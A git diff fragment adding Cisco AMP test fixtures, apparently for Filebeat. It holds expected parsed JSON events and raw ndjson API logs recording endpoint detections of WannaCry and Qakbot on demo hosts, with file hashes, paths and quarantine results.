"cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204910251769881", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 50000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 51942, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:19.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419204910251769885", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204910251770000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53134, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802584", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 55679, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802583", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 894000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 56872, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802582", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 58065, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802581", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 59258, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802580", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 800000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 60451, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:18.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 644000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204905956803000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 61637, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4688, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204901661835277", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 802000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 65559, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log new file mode 100644 index 00000000000..9842f3cbe93 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log @@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} 